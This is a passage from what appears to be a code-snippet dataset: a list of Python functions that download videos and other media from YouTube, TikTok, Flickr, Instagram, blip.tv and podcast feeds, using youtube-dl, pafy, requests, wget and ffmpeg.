get_content('http://www.youtube.com/watch?v=%s' % id)\n ytplayer_config = json.loads(match1(video_page, r'ytplayer.config\\s*=\\s*([^\\n]+);'))\n \n title = ytplayer_config['args']['title']\n stream_list = ytplayer_config['args']['url_encoded_fmt_stream_map'].split(',')\n \n streams = {\n parse.parse_qs(stream)['itag'][0] : parse.parse_qs(stream)\n for stream in stream_list\n }\n \n for codec in yt_codecs:\n itag = str(codec['itag'])\n if itag in streams:\n download_stream = streams[itag]\n break\n \n url = download_stream['url'][0]\n if 'sig' in download_stream:\n sig = download_stream['sig'][0]\n else:\n sig = decrypt_signature(download_stream['s'][0])\n url = '%s&signature=%s' % (url, sig)\n \n type, ext, size = url_info(url)\n \n print_info(site_info, title, type, size)\n if not info_only:\n download_urls([url], title, ext, size, output_dir, merge = merge)", "def download_video(video_stream):\n global file_size\n file_size = size_in_mb(video_stream.filesize)\n home_dir = os.environ['HOME']\n path = f'{home_dir}/Downloads/Video'\n print('-'*60)\n print(f'Filename:\\t{video_stream.title}')\n print(f'Location:\\t{path}')\n print(f'Size:\\t\\t{file_size} MB\\n')\n\n filename = video_stream.title + '_video.mp4'\n filename = filename.replace('/', ' ')\n filename = filename.replace('\\\\', ' ')\n\n if os.path.exists(os.path.join(path, filename)):\n print(\"The file has been already downloaded.\")\n sys.exit()\n \n video_stream.download(path, filename)", "def download_video(url, fn):\n start_time = time.time()\n\n # Sorry: This is terrible code, but I'm kind of throwing it\n # together as I discover more about it.\n print ' Downloading {0} to {1}'.format(url, fn)\n\n resp = requests.get(url)\n if resp.status_code != 200:\n print ' GAH! MY EYES! {0} kicked up {1}'.format(url, resp.status_code)\n return\n\n rss_url_m = re.search(r'\"(/rss/flash/\\d+)\"', resp.content)\n rss_url = 'http://blip.tv' + rss_url_m.group(0).strip('\"')\n resp = requests.get(rss_url)\n\n rss_content = resp.content\n\n for ending in POSSIBLE_ENDINGS:\n regex = r'\"http://blip.tv[^\"]+?' 
+ ending + '\"'\n\n download_m = re.search(regex, rss_content)\n if not download_m:\n print ' No {0} url found'.format(ending)\n continue\n\n download_url = download_m.group(0).strip('\"')\n print ' Attempting to download {0}'.format(download_url)\n\n try:\n resp = requests.get(download_url, stream=True)\n print ' Downloading {0}'.format(download_url)\n if resp.status_code == 200:\n total_length = int(resp.headers['content-length'])\n\n if os.path.exists(fn + ending) and file_size(fn + ending) == total_length:\n print ' Already downloaded.'\n return\n\n with open(fn + ending, 'w') as fp:\n total_downloaded = 0\n\n tic_chunk = total_downloaded\n tic = time.time()\n for chunk in resp.iter_content(chunk_size=1024):\n if chunk:\n fp.write(chunk)\n fp.flush()\n tic_chunk += len(chunk)\n total_downloaded += len(chunk)\n\n if time.time() - tic > 1:\n with TERM.location(x=0):\n line = ' {0} {1}kbps'.format(\n format_downloaded(total_downloaded, total_length),\n int(tic_chunk / (time.time() - tic) / 1000))\n sys.stdout.write(line + TERM.clear_eol)\n sys.stdout.flush()\n tic_chunk = 0\n tic = time.time()\n print ''\n\n print ' Done! {0} {1}mb {2}'.format(\n fn + ending,\n int(total_length / 1000000.0),\n format_duration(time.time() - start_time))\n return\n\n else:\n print ' HTTP{0}! GAH! SPUTTER!'.format(resp.status_code)\n\n except requests.exceptions.ConnectionError as exc:\n print ' CONNECTIONERROR! GAH! SPUTTER! {0}'.format(exc)\n\n print ' SO MANY FAILURES!'\n raise NoDownloadMeNoLikeyException()", "def download_video(video_url, output_path, output_name=\"\", default_type=\"mp4\", verbose=False):\n try:\n if \".\" not in output_name:\n output_name = f\"{output_name}.{default_type}\"\n output_path = os.path.join(output_path, output_name)\n api_response = core.get_request_with_retries(video_url)\n core_utils.print_if_verbose('Processing...', verbose)\n f = open(output_path, 'wb')\n for chunk in api_response.iter_content(chunk_size=255):\n # filter out keep-alive new chunks\n if chunk:\n f.write(chunk)\n core_utils.print_if_verbose(f'The video has been exported here: {output_path}', verbose)\n f.close()\n except Exception as exception_msg:\n print(f\"The video could not be downloaded due to the following error: {exception_msg}\")\n return", "def download_all(self):\r\n download_path = os.path.join(self.download_path, self.username)\r\n already_downloaded = []\r\n successful_downloads = []\r\n failed_downloads = []\r\n if not os.path.exists(download_path):\r\n os.makedirs(download_path)\r\n elif not os.path.isdir(download_path):\r\n raise NotADirectoryError(\"Download path is not a directory: \" + download_path)\r\n elif self.skip_downloaded:\r\n for item in os.listdir(download_path):\r\n file_path = str(os.path.join(download_path, item))\r\n if os.path.isfile(file_path):\r\n parsed_file = self._parse_file_name(os.path.basename(file_path))\r\n if parsed_file is not None:\r\n already_downloaded.append(parsed_file[\"id\"])\r\n for index, item in enumerate(self.videos):\r\n # Don't download it if the user has set that option, and the tiktok already exists on the disk\r\n if item[\"id\"] in already_downloaded:\r\n logger.info(\"Already downloaded video with id: \" + item[\"id\"])\r\n continue\r\n file_name = self._format_file_name(item[\"createTime\"], item[\"id\"])\r\n file_path = os.path.join(download_path, file_name)\r\n logger.info(\"Downloading video: \" + file_name + \" (\" + str(index + 1) + \"/\" + str(len(self.videos)) + \")\")\r\n video_url = self._format_video_url(item)\r\n success = 
self.download_video(file_path, video_url, item[\"createTime\"])\r\n if success:\r\n successful_downloads.append(video_url)\r\n else:\r\n failed_downloads.append(video_url)\r\n sleep_time = random.uniform(self.sleep_min, self.sleep_max)\r\n logger.info(\"Sleeping for: \" + str(sleep_time) + \" seconds\")\r\n sleep(sleep_time)\r\n logger.info(\"Processed all {} videos\".format(self.video_count))\r\n logger.debug(\"Fallback counter: \" + str(self.fallback_counter))\r\n logger.debug(\"YouTube-dl DownloadError counter: \" + str(self.fallback_counter))\r\n logger.debug(\"Other error counter: \" + str(self.other_error_counter))\r\n return {\"successful_downloads\": successful_downloads,\r\n \"failed_downloads\": failed_downloads,\r\n \"skipped_downloads\": already_downloaded}", "def download_clip(row, label_to_dir, trim, trimmed_label_to_dir, count):\n\n label = row['label']\n filename = row['youtube_id']\n time_start = row['time_start']\n time_end = row['time_end']\n\n # if trim, save full video to tmp folder\n output_path = label_to_dir['tmp'] if trim else label_to_dir[label]\n\n ydl_opts = {\n 'format': 'bestvideo[ext=mp4][filesize <? 50M]',\n }\n \n # Don't download if the video has already been trimmed\n has_trim = False\n if trim:\n start = str(time_start)\n end = str(time_end - time_start)\n output_filename = os.path.join(trimmed_label_to_dir[label],\n filename + '_{}_{}'.format(start, end) + VIDEO_EXTENSION)\n\n has_trim = os.path.exists(output_filename)\n\n # Don't download if already exists\n if not os.path.exists(os.path.join(output_path, filename + VIDEO_EXTENSION)) and not has_trim:\n print('Start downloading: ', filename) \n ydl_opts['outtmpl'] = os.path.join(output_path, '%(id)s.%(ext)s')\n \n try:\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([URL_BASE + filename])\n except YoutubeDLError as e:\n print('Download failed for ' + filename)\n log.warning(filename)\n return False\n\n print('Finish downloading: ', filename)\n else:\n print('Already downloaded: ', filename)\n\n if trim:\n # Take video from tmp folder and put trimmed to final destination folder\n # better write full path to video\n\n\n input_filename = os.path.join(output_path, filename + VIDEO_EXTENSION)\n\n if has_trim:\n print('Already trimmed: ', filename)\n else:\n print('Start trimming: ', filename)\n # Construct command to trim the videos (ffmpeg required).\n command = 'ffmpeg -i \"{input_filename}\" ' \\\n '-ss {time_start} ' \\\n '-t {time_end} ' \\\n '-c:v libx264 -c:a copy -threads 1 -y -nostdin ' \\\n '\"{output_filename}\"'.format(\n input_filename=input_filename,\n time_start=start,\n time_end=end,\n output_filename=output_filename\n )\n try:\n subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n print('Error while trimming: ', filename)\n log.warning(filename)\n return False\n print('Finish trimming: ', filename)\n\n print('Processed %i out of %i' % (count + 1, TOTAL_VIDEOS))", "def downloadvideo(filename):\n url = \"http://openings.moe/video/\" + filename\n f = getfile(url)\n safeprint(Colors.PURPLE + url + Colors.END + \":\\nSaving to --> \" + Colors.YELLOW + filename + Colors.END)\n with open(os.path.basename(url), \"wb\") as local_file:\n try:\n local_file.write(f.read())\n except IOError as e:\n safeprint(\"An error occurred while saving the file, try again. 
\" + str(e))", "def download_video(self, url):\n yt = YouTube(url)\n yt_filtered = yt.streams.filter(progressive=True, file_extension=\"mp4\")\n yt_resolutions = yt_filtered.order_by(\"resolution\")\n\n # Downloads the first video that fits the description\n video = yt_resolutions.desc().first()\n video.download()\n\n # Returns the filename\n return video.default_filename", "def download_ostrich_video(download_to_path):\n urlretrieve(REMOTE_OSTRICH_VID_PATH, download_to_path)", "def download_interval(interval_list):\n start = ['start', 'begin', 'beginning', 'head', 'first']\n end = ['slut', 'end', 'tail', 'finish',\n 'finito', 'fin', 'done', 'finished']\n\n # Iterate over the list\n for link in range(len(interval_list)):\n try:\n video = pafy.new(interval_list[link][0], ydl_opts={\n 'nocheckcertificate': True, \"noplaylist\": True})\n # Only downloads the video if the video hasn't been downloaded before\n if not os.path.exists(os.path.join(\"tmp\", f\"{video.title}.mp4\")):\n video_s = video.getbestvideo()\n # TODO: add a way to get the second best stream (third etc.) when an error occurs using Pafy.videostreams and going through the list\n video_a = video.getbestaudio()\n\n # Checks if the end point is a string\n if interval_list[link][1][1].lower() in end:\n # Where is the stream, where should we start, how long should it run\n mp4_vid = ffmpeg.input(\n video_s.url, ss=interval_list[link][1][0], t=video.duration)\n mp4_aud = ffmpeg.input(\n video_a.url, ss=interval_list[link][1][0], t=video.duration)\n else:\n # Where is the stream, where should we start, how long should it run\n mp4_vid = ffmpeg.input(\n video_s.url, ss=interval_list[link][1][0], t=interval_list[link][1][1])\n mp4_aud = ffmpeg.input(\n video_a.url, ss=interval_list[link][1][0], t=interval_list[link][1][1])\n\n # Do the processing\n try:\n (\n ffmpeg\n .concat(\n # Specify what you want from the streams (v for video and a for audio)\n mp4_vid['v'],\n mp4_aud['a'],\n # One video stream and one audio stream\n v=1,\n a=1\n )\n # Output is title of video with mp4 ending\n .output(os.path.join(\"tmp\", f'{video.title}.mp4'))\n .run()\n )\n except TypeError as e:\n print(f\"An error occurred e 0: {e}\")\n except ffmpeg._run.Error as e:\n print(f\"An error occurred e 1: {e}\")\n except Exception as e:\n print(f\"I couldn't download {interval_list[link]} due to: {e}\")", "def download_skateline_video(download_to_path=None):\n urlretrieve(REMOTE_SKATELINE_VID_PATH, download_to_path)", "def youtube_download(url, output_dir='.', merge=True, info_only=False):\n \n id = match1(url, r'youtu.be/([^/]+)') or parse_query_param(url, 'v')\n assert id\n \n youtube_download_by_id(id, title=None, output_dir=output_dir, merge=merge, info_only=info_only)", "def download(video, save_dir, vid):\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n print(\"--> downloading {}\".format(video.title))\n\n best = video.getbest(preftype=\"mp4\")\n filename = best.download(\n filepath=os.path.join(save_dir,\n \"{}.{}\".format(vid, best.extension)))\n print(\"--> saved to {}\".format(filename))\n\n return os.path.join(save_dir, \"{}.{}\".format(vid, best.extension))", "def test_task_video_download(url_to_video: str, empty_video_resource: VideoResource):\n download_video(url_to_video, empty_video_resource.id)\n empty_video_resource.refresh_from_db()\n video_instance = empty_video_resource.videos.filter(primary=True).first()\n\n assert empty_video_resource.videos.all()\n assert video_instance.extension == 'mp4'\n assert video_instance.primary\n for 
item in video_instance.video.open():\n assert item", "def _download_file(self, video_objects):\n downloaded_video = []\n path=\"media/\"\n for video_object in video_objects:\n if 'contentUrl' in video_object.keys() and video_object['contentUrl']!='':\n \n url = video_object['contentUrl']\n filename = url.split('/')[-1]\n r = requests.get(url, stream=True)\n \n with open(filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024): \n if chunk:\n f.write(chunk)\n\n path+=filename\n return path", "def download(video_identifier,\n output_filename,\n num_attempts=5,\n url_base='https://www.youtube.com/watch?v='):\n # Defensive argument checking.\n assert isinstance(video_identifier, str), 'video_identifier must be string'\n assert isinstance(output_filename, str), 'output_filename must be string'\n assert len(video_identifier) == 11, 'video_identifier must have length 11'\n\n status = False\n\n if not os.path.exists(output_filename):\n command = [\n 'youtube-dl', '--quiet', '--no-warnings', '--no-check-certificate',\n '-f', 'mp4', '-o',\n '\"%s\"' % output_filename,\n '\"%s\"' % (url_base + video_identifier)\n ]\n command = ' '.join(command)\n print(command)\n attempts = 0\n while True:\n try:\n subprocess.check_output(\n command, shell=True, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError:\n attempts += 1\n if attempts == num_attempts:\n return status, 'Fail'\n else:\n break\n # Check if the video was successfully saved.\n status = os.path.exists(output_filename)\n return status, 'Downloaded'", "def download_truncated_ostrich_video(download_to_path=None):\n urlretrieve(REMOTE_TRUNCATED_OSTRICH_VID_PATH, download_to_path)", "def download_video(self, file_path, video_url, video_creation_time):\r\n logger.debug(\"Downloading video created at \" + _format_timestamp_iso(self.tz, video_creation_time) + \" from \"\r\n + video_url + \" to \" + file_path)\r\n failed = False\r\n try:\r\n self._download_with_api(file_path, video_url)\r\n except Exception as e:\r\n logger.debug(\"Video download failed using TikTokApi: \" + str(e))\r\n failed = True\r\n if not os.path.isfile(file_path):\r\n failed = True\r\n logger.debug(\"No file was created by TikTokApi at \" + file_path)\r\n elif os.stat(file_path).st_size < 1024:\r\n failed = True\r\n try:\r\n os.remove(file_path)\r\n logger.debug(\"Deleted malformed TikTokApi download at \" + file_path)\r\n except Exception as ee:\r\n logger.error(\"Unable to delete malformed TikTokApi download at \" + str(ee))\r\n if failed:\r\n sleep_time = random.uniform(self.sleep_min, self.sleep_max)\r\n logger.info(\"Sleeping for: \" + str(sleep_time) + \" seconds\")\r\n sleep(sleep_time)\r\n try:\r\n logger.debug(\"Falling back to YouTube-dl\")\r\n self.fallback_counter += 1\r\n self._download_with_ytdl(file_path, video_url)\r\n if not os.path.isfile(file_path):\r\n raise AssertionError(\"No file was created by YouTube-dl at \" + file_path)\r\n elif os.stat(file_path).st_size < 1024:\r\n try:\r\n os.remove(file_path)\r\n logger.debug(\"Deleted malformed YouTube-dl download at \" + file_path)\r\n except Exception as ee:\r\n raise AssertionError(\"Malformed file was created at \" + file_path +\r\n \" and could not be removed: \" + str(ee))\r\n raise AssertionError(\"Malformed file was created at \" + file_path + \" and was removed\")\r\n failed = False\r\n except youtube_dl.utils.DownloadError as ee:\r\n logger.error(\"YouTube-dl DownloadError: \" + str(ee))\r\n self.ytdl_downloaderror_counter += 1\r\n failed = True\r\n except Exception as ee:\r\n 
logger.error(\"Video download failed with YouTube-dl: \" + str(ee))\r\n self.other_error_counter += 1\r\n failed = True\r\n if not failed:\r\n try:\r\n os.utime(file_path, (video_creation_time, video_creation_time))\r\n except Exception as e:\r\n logger.debug(\"Unable to set utime of \" + str(video_creation_time) + \" on file \" + file_path +\r\n \", Error: \" + str(e))\r\n return True\r\n return False", "def download_inward_video_url(self, download_inward_video_url):\n\n self._download_inward_video_url = download_inward_video_url", "def download_tracked_inward_video_url(self, download_tracked_inward_video_url):\n\n self._download_tracked_inward_video_url = download_tracked_inward_video_url", "def download(pattern):\n query = pattern.lower()\n videolist = getvideolist()\n filename = []\n for video in videolist:\n for value in video.values():\n if query in str(value).lower():\n filename.append(video[\"file\"])\n if filename:\n for name in filename:\n downloadvideo(name)\n else:\n safeprint(\"No video matching the given query was found.\")", "def download(self, url=None):\n if url is None:\n if self.results is None:\n raise ValueError(\"Please specify a valid url.\")\n else:\n url = self.results[0]\n try:\n meta = pafy.new(url)\n except Exception:\n raise IOError(\"Video not available for download.\")\n\n vid = meta.getbest()\n path = vid.download()\n self.videos.append(path)\n return path", "def download_videos(data, category):\n # file_ids = get_existing_file_ids()\n\n # Sorry: This is gross.\n directory = os.path.abspath('./' + slugify(category))\n if not os.path.exists(directory):\n os.mkdir(directory)\n\n print 'Saving files to {0}'.format(directory)\n\n start_time = time.time()\n failed_videos = []\n\n for line in data[category]:\n print ''\n print 'Working on {0} - {1}'.format(line[0], line[2])\n\n # if line[0] in file_ids:\n # print ' Skipping -- already got it'\n # continue\n\n fn = '{0}_{1}'.format(line[0], slugify(line[2]))\n try:\n download_video(line[3], os.path.join(directory, fn))\n except NoDownloadMeNoLikeyException:\n failed_videos.append(line)\n\n print ''\n if failed_videos:\n print 'FAILED VIDEOS:'\n for fail in failed_videos:\n print ' ' + '\\t'.join(fail)\n print ''\n\n print 'Total videos: {0}'.format(len(data[category]))\n print 'Total time: {0}'.format(format_duration(time.time() - start_time))\n return 0", "def youtubefetch(url,outputp=''):\n\toutputpath = os.path.expanduser(outputp)\n\tif (os.path.exists(outputpath) & os.path.isdir(outputpath)) != True:\n\t\toutputpath = '/tmp/'\n\t\n\t(_,_,urlproper) = url.partition(\"?\")\n\t(urlproper,_,_) = urlproper.partition(\"&\")\n\turlproper = \"http://proxy.cs.tcd.ie:8080/www.youtube.com/watch?\" + urlproper\n\tpage = urllib2.urlopen(url).readlines()\n\tfilteredpage = [ elem for elem in page if elem.find(\"fullscreenUrl\") != -1 ]\n\tif (len(filteredpage) == 0):\n\t\treturn 'failed'\n\t\t\n\tfilteredpage = filteredpage[0]\n\t(_, p1, partialurl) = filteredpage.partition(\"video_id=\")\n\t(partialurl , _, name) = partialurl.rpartition(\"&title=\")\n\t(name,_,_) = name.partition(\"'\")\n\tvideourl = \"http://www.youtube.com/get_video.php?\" + p1 + partialurl\n\tvideo = urllib2.urlopen(videourl).read()\n\t#print videourl\n\t#print name\n\toutputfile = open((outputpath+name+\".flv\"),'wb')\n\toutputfile.write(video)\n\toutputfile.flush()\n\toutputfile.close()\n\treturn outputpath+name+\".flv\"", "def download_vid(item):\n vid_name, vid_id = item\n vid = Video(vid_name, vid_id, resolution='224p')\n vid.download()", "def 
download_from_youtube():\n linkinput = input(\"Enter the url you want to download: \")\n youtube_object = Youtube(linkinput)\n youtube_object.youtube()", "def youtube_dl_latest(args=None):\n args = parse_youtube_dl_arguments(args=args)\n download_videos(channels_file=args.channels_file, hierarchy=args.hierarchy)", "def download_all_videos(self, dl_limit=10):\r\n counter = dl_limit\r\n self.video_link_title_keylist = self.video_link_title_dict.keys()\r\n music = []\r\n for title in self.video_link_title_keylist:\r\n try:\r\n title = title.encode('ascii')\r\n # print 'downloading title with counter: ', counter\r\n if not counter:\r\n return random.choice(music) #some margin for randomness, first result isnt always accurate, (gets slower...)\r\n print 'downloading title: ', title\r\n\r\n self.add_result(\"Dowloaded_Song\", title)\r\n\r\n path = self.download_video(self.video_link_title_dict[title], title)\r\n music.append(path)\r\n counter = counter - 1\r\n except:\r\n print \"illegal characters in youtube name\" + title + \"\\n trying next result\"", "def download_forward_video_url(self, download_forward_video_url):\n\n self._download_forward_video_url = download_forward_video_url", "def download_flickr_video(url, save_root, force_overwrite):\n\n # (Try to) open the URL\n response = urlopen(url)\n # Extract the file extension from the resolved URL\n m = re.match(r'(.*)\\?s=.*', response.url)\n _, ext = os.path.splitext(m.group(1))\n # Build the path to save the video to\n video_meta = parse.parse(VIDEO_URL_FORMAT, url)\n user_id = video_meta['user_id']\n video_id = video_meta['video_id']\n save_path = os.path.join(save_root, f'{user_id}-{video_id}{ext}')\n # Save the video\n if os.path.isfile(save_path) and not force_overwrite:\n raise FileExistsError(f'File already exists at {save_path}')\n else:\n with open(save_path, 'wb') as f:\n shutil.copyfileobj(response, f)\n\n return save_path", "def download_video_url(\n video_url: str,\n pipeline: PipelineContext,\n destination=\"%(title)s.%(ext)s\",\n progress=ProgressMonitor.NULL,\n):\n\n config = pipeline.config\n logger = logging.getLogger(__name__)\n logger.info(\"Starting video download from URL: %s\", video_url)\n\n # Setup progress-tracking\n progress.scale(total_work=1.0)\n progress_tracker = YDLProgressTracker(show_progress_bar=True)\n\n # Resolve destination path template\n output_template = complete_template(config.sources.root, destination)\n logger.info(\"Output template: %s\", output_template)\n\n ydl_opts = {\n \"format\": \"mp4\",\n \"logger\": YDLLogger(logger),\n \"progress_hooks\": [progress_tracker.hook],\n \"outtmpl\": output_template,\n }\n\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n # Determine destination file name\n video_info = ydl.extract_info(video_url, download=False)\n file_name = ydl.prepare_filename(video_info)\n logger.info(\"Downloading file: %s\", file_name)\n\n # Download file\n with progress_tracker.track(progress):\n ydl.download([video_url])\n\n progress.complete()\n return file_name", "def downloader(thread_num):\n tid = 'Thread ' + numprefix.format(thread_num) + ': '\n for i in range(thread_num, len(self.titles), thread_count):\n title, link = self.titles[i], self.download_urls[i]\n name = vidprefix.format(i) + ' ' + title + '.mp4'\n tries = 0\n while (not os.path.exists(name) or os.path.getsize(name) == 0) \\\n and tries <= trycount:\n if os.path.exists(name): os.remove(name)\n self.log(tid + 'Calling wget for ' + name)\n subprocess.call(['wget', '--output-document=' + name, link])\n tries += 1\n if 
(not os.path.exists(name) or os.path.getsize(name) == 0):\n self.log(tid + 'wget failed for ' + name)\n else:\n self.log(tid + 'wget successfully downloaded ' + name)", "def download(target_url):\n program_location = sys.executable\n program_name = \"youtube-dl.exe\"\n # Define arguments. see this url for help\n # https://github.com/rg3/youtube-dl\n ignore_errors = \"-i\"\n safe_filenames = \"--restrict-filenames\"\n output_arg = \"-o\"\n output_template = \"download\\%(uploader)s\\%(playlist)s\\%(title)s-%(id)s.%(ext)s\"\n command = [program_name, ignore_errors, safe_filenames, output_arg, output_template, target_url]\n result = subprocess.call(command)\n print \"Command result: \", result", "def download(urls, dest_folder):\n pass", "def start(self):\n\n ydl_opts = {}\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n while True:\n videos = self.get_videos() # getting list of all videos from file\n print('{} videos to go'.format(len(videos))) # print no. of video remaining\n video = get_first_item(videos) # get next video for downloading\n if video is None: # check if video is there or not\n break\n\n ydl.download([video]) # downloading video\n videos.remove(video) # remove video from list\n self.save_file(videos) # save updated list to file\n\n print('All downloaded')", "def download(self, url_match):\n pass", "def video_download_chain_task(uuid):\n chain = signature(\n 'wts_worker.worker.video_download',\n kwargs={'uuid': uuid},\n )\n chain |= signature(\n 'wts_worker.worker.video_register_title',\n kwargs={'uuid': uuid},\n )\n return chain.apply_async()", "def _download(item):\n\n filename = item.filename()\n filename = os.path.join(item.vdir(), filename)\n logger.info(\"Downloading '%s' to %s\" % (item.show, filename))\n\n f = open(filename, \"wb\")\n\n buf = net.tivoget(item.show.url)\n for chunk in buf:\n f.write(chunk)\n\n f.close()\n\n item.downloaded = True\n item.save()", "def dowload_vt():\n print get_date_time_now() + \" ==> Download VT Samples started!\"\n print get_date_time_now() + \" ==> Nothing downloaded\"", "def make_video_url(movie_id, api_key):\n\n MOVIE_URL = \"https://api.themoviedb.org/3/movie/\"\n LANG = \"&language=en-US\"\n # Find the youtube key for video trailer\n connection = requests.get(MOVIE_URL + str(movie_id) +\n \"/videos?api_key=\" + api_key + LANG)\n videos_json = json.loads(connection.text)\n connection.close()\n\n if connection.status_code != 200:\n # constant in case issue is found with connection....\n return VIDEO_URL + '5PSNL1qE6VY'\n else:\n if len(videos_json['results']) == 0:\n # constant in case no video is found for given movie....\n return VIDEO_URL + '5PSNL1qE6VY'\n else:\n # If all well we get aa video url for all movie\n # based on discovery or discovery by year\n return VIDEO_URL + videos_json['results'][0]['key']", "def run_download_flickr_video(queue, save_root, force_overwrite):\n\n while True:\n url = queue.get()\n try:\n save_path = download_flickr_video(url, save_root, force_overwrite)\n log('print', f'Saved video to {save_path}')\n except HTTPError as e:\n if e.code == 404:\n log('warn', f'HTTP error 404 returned for URL {url}')\n except FileExistsError as e:\n log('warn', f'File already exists for URL {url}, skipping')\n\n queue.task_done()", "def download(self, account, code):\n\n url = Spider.BASE_URL + \"/p/%s/?taken-by=%s\" % (code, account)\n r = self.session.get(url)\n content_match = re.search(r\"<script.*?>\\s*?window._sharedData\\s*?=\\s*?({.*}).*?</script>\", r.text,\n re.MULTILINE)\n data = 
json.loads(content_match.group(1))\n media = data['entry_data']['PostPage'][0]['graphql']['shortcode_media']\n download_urls = []\n if media['__typename'] == 'GraphVideo': # video\n download_urls.append(media[\"video_url\"])\n if media['__typename'] == 'GraphImage': # image\n download_urls.append(media[\"display_url\"])\n if media['__typename'] == 'GraphSidecar': # slide\n nodes = media['edge_sidecar_to_children']['edges']\n for node in nodes:\n node = node['node']\n if node['is_video']:\n download_urls.append(node['video_url'])\n else:\n download_urls.append(node['display_url'])\n\n actual_download_dir = os.path.join(download_dir, account)\n if not os.path.isdir(actual_download_dir):\n os.mkdir(actual_download_dir)\n for url in download_urls:\n filename = os.path.join(actual_download_dir, url.split('/')[-1].split('?')[0])\n temp_name = filename + '.tmp'\n if os.path.isfile(filename):\n if self.spider.auto_stop:\n print('file', filename, \"already exists, exiting......\")\n sys.exit()\n print('file', filename, \"already exists, skipping\")\n else:\n print('downloading %s:' % filename)\n r = self.session.get(url, stream=True)\n content_length = int(r.headers['content-length'])\n curr = 0\n with open(temp_name, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n f.write(chunk)\n curr += 1024\n progress(curr, content_length)\n os.rename(temp_name, filename)\n self.spider.item_count += 1", "def download_by_link(link: str, videoid: str) -> [str, str]:\n\t# set youtube_dl arguments \n\tydl_opts = {\n\t\t'quiet': False, # don't write in output\n\t\t'no_warnings': True, # write warnings in output\n\t\t'format': \"bestaudio/best\", # download best audio quality\n\t\t'format': 'mp4', # setup format webm\n\t\t'outtmpl': '%(name)s' + str(videoid) + '.%(ext)s', # setup output name \n\t\t'postprocessor': [{ # dk how this need work, but if this not setup audio didn't download\n\t\t\t'key': \"FFmpegExtractAudioPP\",\n\t\t\t'preferredquality': \"512\",\n\t\t }],\n\t}\n\t# start download audio\n\twith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n\t\tdata = ydl.extract_info(link) # exctrat info about audio\n\tfake_name = \"NA\" + str(videoid)\n\t# TODO: think about this query \n\t# refactoring title \n\ttitle = data.pop('title')\n\ttitle = re.sub(r'[^\\w]', ' ', title)\n\ttitle = translate(title)\n\ttitle = title.replace(' ', '_')\n\treturn fake_name, title", "def download_video_data(self):\n\n def scrape_url(url):\n \"\"\"Scrape the video list, youtube_dl does all the heavy lifting\"\"\"\n ydl_opts = {\n \"ignoreerrors\": True, # Skip private and unavaliable videos\n }\n\n ydl = youtube_dl.YoutubeDL(ydl_opts)\n\n with ydl:\n result_ydl = ydl.extract_info(\n url,\n download=False # No download needed, only the info\n )\n\n logger.debug('Url scraped {}', url)\n if 'entries' in result_ydl:\n # It's a playlist or a list of videos\n return result_ydl['entries']\n # Just a video\n return [result_ydl]\n\n youtube_list = sum((scrape_url(url) for url in self.youtube_lists), [])\n for youtube_video_data in youtube_list:\n if youtube_video_data: # Valid video\n self.youtube_videos.append(\n Video.from_youtube(\n video_data=youtube_video_data, event=self))\n else:\n logger.warning('Null youtube video')", "def podcast_download(self):\r\n warnings.filterwarnings(\"ignore\", category=UnicodeWarning)\r\n now = datetime.datetime.now()\r\n\r\n for podcast_file in self.podcast_list:\r\n published, name, link, title = podcast_file\r\n if self.podcast_list != []:\r\n line_file = (published + ';' + title + ';' + name + ';' 
+ link).encode(\"utf-8\") \r\n if line_file in open(self.download_log).read():\r\n pass\r\n else:\r\n title = unicodedata.normalize('NFKD', title).encode('ascii', 'ignore')\r\n download_folder = os.path.join('downloads', title)\r\n if not os.path.exists(download_folder): \r\n os.makedirs(download_folder)\r\n try:\r\n published = str(parser.parse(published))[:10]\r\n except IOError as error:\r\n print 'Error' + (error) + ': File - ' + str(title)\r\n download_folder = os.path.join(download_folder, published)\r\n if not os.path.exists(download_folder): \r\n os.makedirs(download_folder)\r\n namefile_unicode = link[link.rfind('/')+1:]\r\n namefile_str = unicodedata.normalize('NFKD', \r\n namefile_unicode).encode('ascii', 'ignore')\r\n namefile_str = namefile_str.decode('utf-8', 'ignore').encode(\"utf-8\")\r\n if '.mp3' in namefile_str:\r\n len_name = namefile_str.index('.mp3')\r\n elif '.MP3' in namefile_str:\r\n len_name = namefile_str.index('.MP3')\r\n namefile_str = namefile_str[:len_name + 4]\r\n fileoutput = os.path.join(download_folder, namefile_str)\r\n name = unicodedata.normalize('NFKD', name).encode('ascii', 'ignore')\r\n print str(published) + '; ' + name\r\n ## downlink\r\n download_file(link, fileoutput) \r\n ## tagging\r\n mp3_tagging(fileoutput, podcast_file)\r\n ## write log\r\n write_file(self.download_log, line_file)\r\n end = datetime.datetime.now()\r\n print '\\r' + 'Download Time = ' + str(end-now) + '\\r'\r\n return None", "def extract_url_download(update: Update, context: CallbackContext) -> None:\r\n received_text = update.message.text\r\n yt_urls = get_link_text(received_text)\r\n yt_urls_msg = update.message.reply_text(pretty_url_string(yt_urls), disable_web_page_preview=True)\r\n if len(yt_urls) > 0:\r\n for url in yt_urls:\r\n if 'list=' in url:\r\n print(\"dshgshj\")\r\n\t\t\t\t# download_playlist_url(update, context, url)\r\n else:\r\n download_url(update, context, url)\r\n context.bot.delete_message(message_id=yt_urls_msg.message_id, chat_id=yt_urls_msg.chat_id)", "def download_urls(urls_filename, reverse=True, log_filename='youtube-playlist-download.log'):\n urls_file = open(urls_filename)\n url_lines = urls_file.read().splitlines();\n urls_file.close()\n if reverse:\n url_lines = reversed(url_lines)\n\n logfile = open(log_filename, 'w')\n logfile.write('\\n' + str(datetime.now()) + '\\n')\n logfile.flush()\n\n # use -f best to avoid merging and just get the best overall format (saves time)\n youtube_cmd_with_args = ['youtube-dl', '--ignore-errors', '--ignore-config', '--write-info-json', '--no-mtime', '-f best', '-o ' + get_full_filename()]\n\n try:\n for line in url_lines:\n url_id, title = line.split('\\t')[:2]\n print('Downloading video: \"' + title + '\" with id \"' + url_id + '\"')\n run(youtube_cmd_with_args + [YT_PREFIX + url_id])\n print('Done downloading url:', url_id)\n notify('Done downloading url:' + url_id)\n logfile.write('Downloaded\\t' + url_id + '\\t' + title + '\\n')\n logfile.flush()\n except KeyboardInterrupt as 